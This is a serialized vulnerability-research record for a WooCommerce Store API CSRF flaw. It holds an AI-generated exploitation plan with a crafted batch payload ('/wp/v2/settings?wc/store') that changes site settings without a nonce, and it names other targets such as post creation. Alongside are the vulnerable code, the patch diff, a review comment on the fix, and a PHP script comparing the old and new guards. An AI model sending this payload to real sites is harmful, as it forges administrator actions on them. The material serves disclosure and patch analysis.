[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fxID_kXXK3DxRytfn366AYWeB_eKpyX1MBbCUc0mjwhw":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":34,"research_vulnerable_code":35,"research_fix_diff":36,"research_exploit_outline":37,"research_model_used":38,"research_started_at":39,"research_completed_at":40,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":41},"CVE-2026-3589","woocommerce-cross-site-request-forgery-3","WooCommerce \u003C 10.5.3 - Cross-Site Request Forgery","The WooCommerce plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to 10.5.3 (exclusive). This is due to missing or incorrect nonce validation on a function. 
This makes it possible for unauthenticated attackers to perform an unauthorized action granted they can trick a site administrator into performing an action such as clicking on a link.","woocommerce",null,"\u003C10.5.3","10.5.3","medium",4.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:R\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Cross-Site Request Forgery (CSRF)","2026-03-10 00:00:00","2026-03-19 14:13:00",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fdf7eca9b-e353-49e7-8706-89c1787637e9?source=api-prod",10,[22,23,24,25,26,27,28,29],"i18n\u002Flanguages\u002Fwoocommerce.pot","includes\u002Fclass-woocommerce.php","readme.txt","src\u002FStoreApi\u002FRoutes\u002FV1\u002FBatch.php","vendor\u002Fcomposer\u002Finstalled.php","vendor\u002Fcomposer\u002Fjetpack_autoload_classmap.php","vendor\u002Fcomposer\u002Fjetpack_autoload_filemap.php","woocommerce.php","researched",false,3,"# Exploitation Research Plan: CVE-2026-3589 (WooCommerce CSRF)\n\n## 1. Vulnerability Summary\nThe WooCommerce plugin (versions \u003C 10.5.3) is vulnerable to Cross-Site Request Forgery (CSRF) through the Store API's batch route. The `Automattic\\WooCommerce\\StoreApi\\Routes\\V1\\Batch` class registers a `\u002Fbatch` REST API endpoint that bundles multiple Store API requests into a single HTTP POST request.\n\nThe `\u002Fbatch` route registers its `permission_callback` as `__return_true` and performs no nonce validation of its own on the container request. Individual Store API routes (such as the cart routes) enforce their own `wc_store_api` nonce on state-changing requests, so the container relies on a path guard to keep the bundled sub-requests inside the Store API. That guard is the defect: it only checks that each sub-request `path` contains the substring `wc\u002Fstore` (`stristr`, case-insensitive, anywhere in the string), so a path such as `\u002Fwp\u002Fv2\u002Fsettings?wc\u002Fstore` passes while targeting a core REST route. The container then hands the bundle to `rest_get_server()->serve_batch_request_v1()`, which dispatches the sub-requests internally, so the cookie-nonce check that a direct request to the core route would face is never applied to them. 
An attacker can trick an authenticated administrator into making a request to this endpoint and, through a crafted sub-request path, perform state-changing actions on REST routes outside the Store API with the administrator's privileges.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** `POST \u002Fwp-json\u002Fwc\u002Fstore\u002Fv1\u002Fbatch` (The namespace `wc\u002Fstore\u002Fv1` is inferred from standard WooCommerce Store API structure and the file path `src\u002FStoreApi\u002FRoutes\u002FV1\u002FBatch.php`).\n- **HTTP Parameter:** `requests` (an array of request objects, each carrying a `path`, a `method` and a `body`).\n- **Authentication:** Unauthenticated (the endpoint is public via `__return_true`), but the attack targets the session of an authenticated user (e.g., Administrator).\n- **Preconditions:** A victim (Administrator) must be logged in and tricked into visiting a malicious page that triggers a cross-origin POST request to the vulnerable endpoint.\n\n## 3. Code Flow\n1. **Entry Point:** The REST API server receives a POST request to `\u002Fwc\u002Fstore\u002Fv1\u002Fbatch`.\n2. **Registration:** `Automattic\\WooCommerce\\StoreApi\\Routes\\V1\\Batch::get_args()` defines the route. Note the `permission_callback`:\n   ```php\n   'permission_callback' => '__return_true',\n   ```\n3. **Processing:** The request is handled by `Batch::get_response( WP_REST_Request $request )`.\n4. **Validation:** The code checks only that each nested request path contains the substring `wc\u002Fstore`, anywhere in the string and case-insensitively:\n   ```php\n   foreach ( $request['requests'] as $args ) {\n       if ( ! stristr( $args['path'], 'wc\u002Fstore' ) ) {\n           throw new RouteException( 'woocommerce_rest_invalid_path', ... );\n       }\n   }\n   ```\n   A path like `\u002Fwp\u002Fv2\u002Fsettings?wc\u002Fstore` satisfies it because the marker sits in the query string, not in the route.\n5. **Internal Dispatch:** The requests are passed to the WordPress core batch server:\n   ```php\n   $response = rest_get_server()->serve_batch_request_v1( $request );\n   ```\n6. **Sink:** `serve_batch_request_v1` dispatches each sub-request (e.g., `POST \u002Fwp\u002Fv2\u002Fsettings?wc\u002Fstore`) internally. 
Because the container request passed its permission check and no nonce check was performed in `get_response`, the sub-requests are processed with the victim's cookie-authenticated session.\n\n## 4. Nonce Handling\nNo nonce has to be acquired for this attack; the point of the route is that none is checked on the container. For comparison, the checks a direct request would face:\n- A direct `POST \u002Fwc\u002Fstore\u002Fv1\u002Fcart\u002Fadd-item` requires the `wc_store_api` nonce in the Store API `Nonce` header (`X-WC-Store-API-Nonce` is the older name of the same header). In modern WooCommerce (v9.0+) that nonce is typically exposed to front-end scripts through the `wcSettings` global on pages rendering the Cart Block or the `[woocommerce_cart]` shortcode.\n- A direct `POST \u002Fwp\u002Fv2\u002Fsettings` with cookie authentication requires a valid `X-WP-Nonce` header; without it WordPress does not treat the request as authenticated.\n\nThe batched sub-request to `\u002Fwp\u002Fv2\u002Fsettings?wc\u002Fstore` is dispatched internally and is never subjected to the second check.\n\n## 5. Exploitation Strategy\nWe will perform a CSRF attack that changes a core site setting through a batched sub-request whose path only contains `wc\u002Fstore` in its query string. This demonstrates a state-changing administrative action performed without any nonce.\n\n1. **Step 1: Record State:** Note the current site title so the change can be verified afterwards.\n2. **Step 2: Identify Endpoint:** Target `http:\u002F\u002Flocalhost:8080\u002Fwp-json\u002Fwc\u002Fstore\u002Fv1\u002Fbatch`.\n3. **Step 3: Craft Payload:** Create a JSON payload for the `requests` parameter. `title` is used here as an example of a writable field exposed by `\u002Fwp\u002Fv2\u002Fsettings`; any field that route accepts works the same way.\n   ```json\n   {\n     \"requests\": [\n       {\n         \"method\": \"POST\",\n         \"path\": \"\u002Fwp\u002Fv2\u002Fsettings?wc\u002Fstore\",\n         \"body\": {\n           \"title\": \"CSRF via batch\"\n         }\n       }\n     ]\n   }\n   ```\n4. **Step 4: Execute Request:** Send the POST (JSON body, `Content-Type: application\u002Fjson`) with the Administrator's cookies attached, as the browser would on a cross-site request, and **omit** both the `X-WP-Nonce` header and any Store API nonce header.\n5. **Step 5: Verify:** Check that the site title changed.\n\nNote that `serve_batch_request_v1` only dispatches sub-requests to routes registered with batch support (`allow_batch`); if the target route rejects batching, the response for that sub-request says so and another batch-enabled route has to be chosen.\n\n## 6. Test Data Setup\nNo product or cart page is required. Record the current site title for comparison:\n   ```bash\n   wp option get blogname\n   ```\n\n## 7. Expected Results\n- The HTTP request to `\u002Fwc\u002Fstore\u002Fv1\u002Fbatch` returns a `200 OK` or `207 Multi-Status`.\n- The response body contains a successful response for the nested `\u002Fwp\u002Fv2\u002Fsettings` request.\n- The site title now reads \"CSRF via batch\".\n- Most importantly: the action succeeded despite the absence of the `X-WP-Nonce` header that a direct cookie-authenticated `POST \u002Fwp\u002Fv2\u002Fsettings` would require.\n\n## 8. Verification Steps\n1. **Check via CLI:**\n   ```bash\n   wp option get blogname\n   ```\n2. **Alternative Verification:**\n   Navigate to the site as admin and confirm the new title appears in the page:\n   ```javascript\n   browser_navigate(\"\u002F\");\n   browser_eval(\"document.title.includes('CSRF via batch')\");\n   ```\n\n## 9. 
Alternative Approaches\nThe bypass is not specific to `\u002Fwp\u002Fv2\u002Fsettings`. Any REST route that the core batch server is willing to dispatch can be reached the same way, as long as the sub-request `path` contains `wc\u002Fstore` somewhere after the route, for example in the query string. If the settings route does not accept batching on the target site, try:\n- **`POST \u002Fwp\u002Fv2\u002Fposts?wc\u002Fstore`**: Creating or publishing a post as the administrator (the core posts controller registers its routes with batch support).\n\nStore API cart routes are not useful targets here: state-changing cart routes enforce their own `wc_store_api` nonce inside the route callback, which runs for batched sub-requests as well, so `POST \u002Fwc\u002Fstore\u002Fv1\u002Fcart\u002Fadd-item` without a `Nonce` header fails inside a batch just as it does directly.\n\nIf the `wc\u002Fstore\u002Fv1` namespace differs, check the WooCommerce versioning and route registrations in `src\u002FStoreApi\u002FRoutes\u002FV1\u002F`. In v10.5.2, `V1` is the current stable Store API version.","The WooCommerce Store API batch processing endpoint was vulnerable to Cross-Site Request Forgery (CSRF) due to a flawed path validation check using 'stristr'. An attacker could exploit this to bypass nonce requirements and execute arbitrary REST API actions by tricking an authenticated administrator into submitting a malicious batch request.","\u002F\u002F src\u002FStoreApi\u002FRoutes\u002FV1\u002FBatch.php:57\n\tpublic function get_args() {\n\t\treturn array(\n\t\t\t'callback'            => [ $this, 'get_response' ],\n\t\t\t'methods'             => 'POST',\n\t\t\t'permission_callback' => '__return_true',\n\t\t\t'args'                => array(\n\n---\n\n\u002F\u002F src\u002FStoreApi\u002FRoutes\u002FV1\u002FBatch.php:117\n\tpublic function get_response( WP_REST_Request $request ) {\n\t\ttry {\n\t\t\tforeach ( $request['requests'] as $args ) {\n\t\t\t\tif ( ! 
stristr( $args['path'], 'wc\u002Fstore' ) ) {\n\t\t\t\t\tthrow new RouteException( 'woocommerce_rest_invalid_path', __( 'Invalid path provided.', 'woocommerce' ), 400 );\n\t\t\t\t}\n\t\t\t}\n\t\t\t$response = rest_get_server()->serve_batch_request_v1( $request );","--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwoocommerce\u002F10.5.2\u002Fsrc\u002FStoreApi\u002FRoutes\u002FV1\u002FBatch.php\t2025-03-03 17:28:12.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwoocommerce\u002F10.5.3\u002Fsrc\u002FStoreApi\u002FRoutes\u002FV1\u002FBatch.php\t2026-03-02 18:33:46.000000000 +0000\n@@ -117,7 +117,8 @@\n \tpublic function get_response( WP_REST_Request $request ) {\n \ttry {\n \t\tforeach ( $request['requests'] as $args ) {\n-\t\t\tif ( ! stristr( $args['path'], 'wc\u002Fstore' ) ) {\n+\t\t\t$parsed_path = wp_parse_url( $args['path'], PHP_URL_PATH );\n+\t\t\tif ( ! $parsed_path || strpos( $parsed_path, '\u002Fwc\u002Fstore' ) !== 0 ) {\n \t\t\t\tthrow new RouteException( 'woocommerce_rest_invalid_path', __( 'Invalid path provided.', 'woocommerce' ), 400 );\n \t\t\t}\n \t\t}","An attacker can perform a CSRF attack against an authenticated administrator by constructing a POST request to the `\u002Fwp-json\u002Fwc\u002Fstore\u002Fv1\u002Fbatch` endpoint. This endpoint's `permission_callback` is set to `__return_true`, and it does not perform its own nonce validation. The attacker provides a JSON payload containing a `requests` array where each request object specifies a target REST API path. To bypass the vulnerable `stristr` path check, the attacker appends the string `wc\u002Fstore` as a query parameter (e.g., `\u002Fwp\u002Fv2\u002Fsettings?wc\u002Fstore`). When the victim's browser submits the request, the WordPress REST server dispatches the sub-requests internally via `serve_batch_request_v1`. 
These internal requests are processed using the victim's session cookies but bypass the standard REST API nonce checks typically required for state-changing administrative actions.","gemini-3-flash-preview","2026-04-18 05:09:25","2026-04-18 05:10:06",{"type":42,"vulnerable_version":43,"fixed_version":11,"vulnerable_browse":44,"vulnerable_zip":45,"fixed_browse":46,"fixed_zip":47,"all_tags":48},"plugin","10.5.2","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwoocommerce\u002Ftags\u002F10.5.2","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwoocommerce.10.5.2.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwoocommerce\u002Ftags\u002F10.5.3","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwoocommerce.10.5.3.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwoocommerce\u002Ftags"]
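Review bot: the replacement guard in the `get_response()` hunk, `strpos( $parsed_path, '/wc/store' ) !== 0`, is a bare prefix test with no terminating slash, so any sub-request path whose first nine characters happen to be `/wc/store` (a hypothetical `/wc/storefront/...` namespace, for instance) would still be accepted as a Store API request; comparing against `'/wc/store/'` ties the check to the actual namespace. Two behaviour changes also deserve a changelog line: the new check is case-sensitive where `stristr` was not, so `/WC/STORE/...` sub-request paths that used to pass now get the 400 `woocommerce_rest_invalid_path` error, and a `path` that `wp_parse_url()` cannot parse (`! $parsed_path`) now yields that same error.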
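The following is an added example, not code from WooCommerce or from this page: it places the pre-10.5.3 path guard from `Batch::get_response()` next to the 10.5.3 guard and runs both over constructed sub-request paths, including the `?wc/store` shape from the exploit outline. PHP's built-in `parse_url()` stands in for `wp_parse_url()`, which wraps it; the function names and sample paths are the example's own.

```php
<?php
// Added example (not WooCommerce code): the pre-10.5.3 Batch::get_response()
// path guard next to the 10.5.3 guard, run over constructed sub-request paths.
// parse_url() stands in for wp_parse_url(), which wraps it.

/** Pre-fix guard: passes if "wc/store" occurs anywhere in the string, case-insensitively. */
function batch_path_allowed_vulnerable( string $path ): bool {
	return stristr( $path, 'wc/store' ) !== false;
}

/** 10.5.3 guard: only the path component counts, and it must start with "/wc/store". */
function batch_path_allowed_fixed( string $path ): bool {
	$parsed_path = parse_url( $path, PHP_URL_PATH ); // wp_parse_url() in WooCommerce
	return ! empty( $parsed_path ) && strpos( $parsed_path, '/wc/store' ) === 0;
}

// Constructed sample paths: one legitimate Store API call, then the shapes an
// attacker can use to smuggle a core route past the substring check.
$samples = array(
	'/wc/store/v1/cart/add-item'   => 'legitimate Store API sub-request',
	'/wp/v2/settings?wc/store'     => 'marker in the query string (exploit outline)',
	'/wp/v2/posts#wc/store'        => 'marker in the fragment',
	'/wp/v2/users?search=wc/store' => 'marker as a query value',
	'/WP/V2/SETTINGS?WC/STORE'     => 'upper-case marker (stristr ignores case)',
	'/wp/v2/settings'              => 'no marker at all',
);

printf( "%-32s %-11s %-7s %s\n", 'sub-request path', 'vulnerable', 'fixed', 'why' );
foreach ( $samples as $path => $why ) {
	printf(
		"%-32s %-11s %-7s %s\n",
		$path,
		batch_path_allowed_vulnerable( $path ) ? 'allow' : 'reject',
		batch_path_allowed_fixed( $path ) ? 'allow' : 'reject',
		$why
	);
}
```

Run it with the `php` CLI. Only the first row passes both guards; every row that carries the marker outside the route path passes the vulnerable guard and is rejected by the fixed one, because the query string and fragment are discarded before the prefix comparison.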